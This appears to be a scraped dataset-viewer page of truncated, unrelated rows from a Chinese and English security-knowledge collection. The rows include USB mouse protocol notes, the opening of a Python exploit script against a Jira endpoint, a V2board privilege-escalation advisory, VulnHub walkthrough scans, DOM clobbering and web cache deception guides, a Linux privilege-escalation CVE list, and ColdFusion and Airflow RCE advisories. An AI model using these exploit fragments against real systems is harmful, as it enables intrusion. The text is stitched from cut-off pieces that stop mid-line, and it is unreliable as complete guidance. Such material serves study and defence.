- 鼠标协议
鼠标移动时表现为连续性,与键盘击键的离散性不一样,不过实际上鼠标动作所产生的数据包也是离散的,毕竟计算机表现的连续性信息都是由大量离散信息构成的
每一个数据包的数据区有四个字节,第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。第二个字节可以看成是一个sig... | sec-knowleage |
# -*- coding: utf-8 -*-
import requests
req = requests.Session()
def Base(url,subject):
print("[+] Get Token")
r = req.get("%s/secure/ContactAdministrators!default.jspa" % url)
c = r.headers['Set-Cookie']
t = c[c.find("=")+1:c.find(";")]
data = {
"from": "test@test.com",
"subject":... | sec-knowleage |
from PIL import Image
import sys, math
nice = []
for f in range(464):
im = Image.open("tv/out-"+str(f)+".png")
pix = im.load()
for y in range(200):
for x in range(200):
if(pix[y, x] != 0 and pix[y, x] != 0xff):
if(f not in nice):
nice.append(f)
print(nice) | sec-knowleage |
# V2board 1.6.1 Privilege Escalation
[中文版本(Chinese version)](README.zh-cn.md)
V2board is a multiple proxy protocol manage panel application interface. In the version of 1.6.1, it is introduced a redis cache mechanism to save the user session.
Since there is no distinction between administrator and normal user in the... | sec-knowleage |
A recently released information about an old data beach of more than 500 million Yahoo users has put question mark on the multi-billion dollars sale of Yahoo to Verizon. After all, no-one wants to acquire a liability and not account for all future costs involved. Online dating app for spouse cheaters, Ashley Madison ha... | sec-knowleage |
# CYBERSPLOIT: 1
> https://download.vulnhub.com/cybersploit/cybersploit.ova
靶场IP:`192.168.2.17`
扫描对外端口服务
```
┌──(root㉿kali)-[/tmp]
└─# nmap -p1-65535 -sV 192.168.2.17
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-08 10:33 EDT
Nmap scan report for 192.168.2.17
Host is up (0.000078s latency).
Not shown: 65533 closed... | sec-knowleage |
vgconvert
===
转换卷组元数据格式
## 补充说明
**vgconvert命令** 用于转换指定LVM卷组的元数据格式,通常将“LVM1”格式的卷组转换为“LVM2”格式。转换卷组元数据前必须保证卷组处于非活动状态,否则无法完成转换操作。
### 语法
```shell
vgconvert(选项)(参数)
```
### 选项
```shell
-M:要转换的卷组格式。
```
### 参数
卷组:指定要转换格式的卷组。
### 实例
转换卷组元数据格式前,使用vgchange命令将卷组设置为非活动状态。在命令行中输入下面的命令:
```shell
[root@localhost lvm]# vgchange -... | sec-knowleage |
# Dom Clobbering
> DOM Clobbering is a technique where global variables can be overwritten or "clobbered" by naming HTML elements with certain IDs or names. This can cause unexpected behavior in scripts and potentially lead to security vulnerabilities.
## Summary
* [Lab](#lab)
* [Exploit](#exploit)
* [References](#refe... | sec-knowleage |
# 方法
---
- https://www.kancloud.cn/imxieke/ruby-base/107294
---
# 方法的调用
**简单的方法调用**
调用方法的语法如下所示:
```ruby
对象. 方法名( 参数 1, 参数 2, … , 参数 n )
```
以对象开头,中间隔着句点,后面接着是方法名,方法名后面是一排并列的用 `()` 括起来的参数。不同的方法定义的参数个数和顺序也都不一样,调用方法时必须按照定义来指定参数。另外,调用方法时 `()` 是可以省略的。
上面的对象被称为接收者(receiver)。在面向对象的世界中,调用方法被称为“向对象发送消息(message)”,调用的结果就是“对象接收(r... | sec-knowleage |
# PWNOS:2.0
下载地址:https://download.vulnhub.com/pwnos/pWnOS_v2.0.7z
## 实战演练
靶机的IP为静态地址10.10.10.100



... | sec-knowleage |
## Reflected File Download (RFD)
## Introduction
Reflected File Download (RFD) is web based attack that extends reflected attacks beyond the context of the web browser. Attackers can build malicious URLs which once accessed, download files, and store them with any desired extension, giving a new malicious meaning to re... | sec-knowleage |
# 讨论交流
如果你有任何想要讨论的问题,请选择 [Github Discussion](https://github.com/ctf-wiki/ctf-wiki/discussions) 或者 [Slack](https://join.slack.com/t/ctf-wiki/shared_invite/enQtNTkwNDg5NDUzNzAzLTQ3YTliNzI5OGNhM2NmNzI3NTU0YWRlNWFkY2EzYTExN2Y3ZjRkNzYzYmRhNDNlYmY5YTVmNjNhYjliZDgyNTY). | sec-knowleage |
---
title: Feedly
date: 2022-11-23 16:23:31.705686
background: bg-[#55a955]
label:
tags:
-
-
categories:
- Keyboard Shortcuts
intro: |
A visual cheat-sheet for the 25 keyboard shortcuts found on the Feedly app
---
Keyboard Shortcuts
------------------
### Navigation {.row-span-2}
Shortcut | Action
-... | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: read.n,v 1.2 2003/11/24 05:09:59 b... | sec-knowleage |
### 关于Heap flags
`Heap flags`包含有两个与`NtGlobalFlag`一起初始化的标志: `Flags`和`ForceFlags`. 这两个字段的值不仅会受调试器的影响, 还会由windows版本而不同, 字段的位置也取决于windows的版本.
* Flags字段:
* 在32位Windows NT, Windows 2000和Windows XP中, `Flags`位于堆的`0x0C`偏移处. 在32位Windows Vista及更新的系统中, 它位于`0x40`偏移处.
* 在64位Windows XP中, `Flags`字段位于堆的`0x14`偏移处, 而在64位Windows... | sec-knowleage |
# store
General Skills, 350 points
## Description:
> We started a little store, can you buy the flag?
```c
#include <stdio.h>
#include <stdlib.h>
int main()
{
int con;
con = 0;
int account_balance = 1100;
while(con == 0){
printf("Welcome to the Store App V1.0\n");
printf("World's Most Se... | sec-knowleage |
# Adobe ColdFusion AMF Deserialization Remote Command Execution (CVE-2017-3066)
[中文版本(Chinese version)](README.zh-cn.md)
Adobe ColdFusion is a commercial rapid web-application development computing platform created by J. J. Allaire in 1995.
Adobe ColdFusion 2016 Update 3 and earlier, ColdFusion 11 update 11 and earl... | sec-knowleage |
Various writeups for the [2022 Intent CTF](https://ctf.intentsummit.org) ([CTFTime Link](https://ctftime.org/event/1773)). Writeups for additional challenges can be found [here](https://jctf.team/INTENT-CTF-2022/).
Participated as part of the [JCTF team](https://jctf.team/), which came in first!
 | sec-knowleage |
## pcapin (forensics, 150p, 41 solves)
> We have extracted a pcap file from a network where attackers were present. We know they were using some kind of file transfer protocol on TCP port 7179. We're not sure what file or files were transferred and we need you to investigate. We do not believe any strong cryptography w... | sec-knowleage |
# BugDB v2
## [Flag0](./flag0) -- Found
- What has changed since last version?
- What do the queries tell you?
- Have you tried a mutation? | sec-knowleage |
# Web Cache Deception
## Summary
* [Tools](#tools)
* [Exploit](#exploit)
* [Methodology - Caching Sensitive Data](#methodology---caching-sensitive-data)
* [Methodology - Caching Custom JavaScript](#methodology---caching-custom-javascript)
* [CloudFlare Caching](#cloudflare-caching)
* [Labs](#labs)
* [References](#refer... | sec-knowleage |
# Linux 提权 -- 依赖 exp 篇
### exp注:
```wiki
CVE-2017-1000367 [Sudo] (Sudo 1.8.6p7 - 1.8.20)
CVE-2017-1000112 [a memory corruption due to UFO to non-UFO path switch]
CVE-2017-7494 [Samba Remote execution] (Samba 3.5.0-4.6.4/4.5.10/4.4.14)
CVE-2017-7308 [a signedness issue in AF_PACKET sockets] (Linux kernel through 4.10.... | sec-knowleage |
from math import sqrt
def fail(memes, calcium):
dank = True
if calcium < memes:
if memes % calcium == 0:
dank = False
else:
wew = fail(memes, calcium + 1)
dank = wew
return dank
def epicfail(memes):
if memes > 1:
if dank(memes, 2):
... | sec-knowleage |
# ModSecurity实现waf
## 安装与使用
```
# 操作系统:Centos7
# 解决依赖环境
yum install gcc.x86_64 libxml2-devel.x86_64 httpd.x86_64 httpd-devel.x86_64 pcre2.x86_64 pcre2-devel.x86_64 -y
# 安装mod_security
yum install mod_security.x86_64 -y
# 查看http 模块,结果如图
httpd -M | grep security
```

Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。
由于启动的组件比较多,可能会有点卡,运行此环境可能需要准备2G以上的内存。
参考链接:
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/apache/airflow/pull... | sec-knowleage |
# T1563-002-win-远程服务会话劫持-RDP劫持
## 来自ATT&CK的描述
攻击者可能会劫持合法用户的远程桌面会话用以在内网环境中横向移动。远程桌面是操作系统中的常见功能。它允许用户使用远程系统上的系统桌面图形用户界面登录到交互式会话。Microsoft 将其远程桌面协议 (RDP) 的实现称为远程桌面服务 (RDS)。
攻击者可能会进行RDP会话劫持,包括窃取合法用户的远程会话。通常情况下,当别人试图窃取他们的会话时,用户会得到通知。通过系统权限和使用终端服务控制台,c:\windows\system32\tscon.exe[要窃取的会话号码],攻击者可以劫持一个会话,而不需要凭证或提示用户。这可以在远程或本地进行... | sec-knowleage |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.